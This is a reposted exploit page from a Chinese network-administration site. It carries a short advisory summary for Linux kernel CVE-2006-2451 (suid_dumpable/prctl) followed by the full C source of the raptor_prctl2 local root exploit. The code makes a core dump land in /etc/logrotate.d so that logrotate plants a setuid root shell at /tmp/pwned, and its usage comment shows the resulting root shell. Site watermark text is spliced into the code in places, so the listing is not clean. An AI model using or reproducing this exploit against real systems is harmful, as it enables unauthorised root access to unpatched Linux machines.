网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > Exploit > Linux Local Root  

Linux Local Root

2006-07-26  作者:BitsCN.com  来源:中国网管联盟  点评 投稿 收藏

Summary
The suid_dumpable support in certain versions of theLinux kernel allows a local user to cause a denial of service (disk consumption) attack. Also, the attacker can possibly gain privileges via the PR_SET_DUMPABLE argument of the prctl function,A program that causes a core dump file to be created in a directory for which the user does not have permissions.
 
Credit:
The information has been provided by milw0rm.
The original article can be found at:
http://www.milw0rm.com/exploits/2031
http://www.0xdeadbeef.info/exploits/raptor_prctl.c
 
 Details
Vulnerable Systems:
 * Linux kernel version 2.6.13 to 2.6.17.4
 * Linux kernel version 2.6.16 to 2.6.16.24

CVE Information:
CVE-2006-2451

Exploit:
/*
 * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $
 *
 * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
 * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> 中国网管论坛bbs.bitsCN.com
 *
 * The suid_dumpable support in Linux kernel 2.6.13 up to versions before
 * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
 * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via
 * the PR_SET_DUMPABLE argument of the prctl function and a program that causes
 * a core dump file to be created in a directory for which the user does not
 * have permissions (CVE-2006-2451).
 *
 * This exploit uses the logrotate attack vector: of course, you must be able
 * to chdir() into the /etc/logrotate.d directory in order to exploit the
 * vulnerability. I've experimented a bit with other attack vectors as well,
 * with no luck: at (/var/spool/atjobs/) uses file name information to
 * establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x
 * permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled
 * coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c).
网管u家u.bitscn@com

 *
 * Thanks to Solar Designer for the interesting discussion on attack vectors.
 *
 * NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!!
 *
 * Usage:
 * $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall
 * [exploit must be statically linked]
 * $ ./raptor_prctl2
 * [please wait until logrotate is run]
 * $ ls -l /tmp/pwned
 * -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned
 * $ /tmp/pwned
 * sh-3.00# id
 * uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)
 * sh-3.00#
 * [don't forget to delete /tmp/pwned!]
 *
 * Vulnerable platforms:
 * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/stat.h>
#include <sys/resource.h>

网管bitscn_com


#include <sys/prctl.h>

#define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"

char payload[] = /* commands to be executed by privileged logrotate */
"\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n";

char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main()\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";

int main(void)
{
 int pid;
 struct rlimit corelimit;
 struct stat st;

 /* print exploit information */
 fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

 /* prepare the setuid() helper */
 system(pwnage);

 /* set core size to unlimited */ 网管网www.bitscn.com
 corelimit.rlim_cur = RLIM_INFINITY;
 corelimit.rlim_max = RLIM_INFINITY;
 setrlimit(RLIMIT_CORE, &corelimit);

 /* let's create a fake logfile in /var/log */
 if (!(pid = fork())) {
  chdir("/var/log");
  prctl(PR_SET_DUMPABLE, 2);
  sleep(666);
  exit(1);
 }
 kill(pid, SIGSEGV);

 /* let's do the PR_SET_DUMPABLE magic */
 if (!(pid = fork())) {
  chdir("/etc/logrotate.d");
  prctl(PR_SET_DUMPABLE, 2);
  sleep(666);
  exit(1);
 }
 kill(pid, SIGSEGV);

 /* did it work? */
 sleep(3);
 if ((stat("/var/log/core", &st) < 0) ||
 (stat("/etc/logrotate.d/core", &st) < 0)) {
  fprintf(stderr, "Error: Not vulnerable? See comments.\n");
  exit(1);
 }

 /* total pwnage */
 fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n"); 网管网www_bitscn_com
 exit(0);
}

TAGs   exit   pid   if   stderr   sleep   fprintf   prctl   PR_SET_DUMPABLE    
 上一篇:Javascript Based Port Scanner   下一篇:Linux Kernel 2.6.x PRCTL Core Dump Handling
Linux Local Root 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: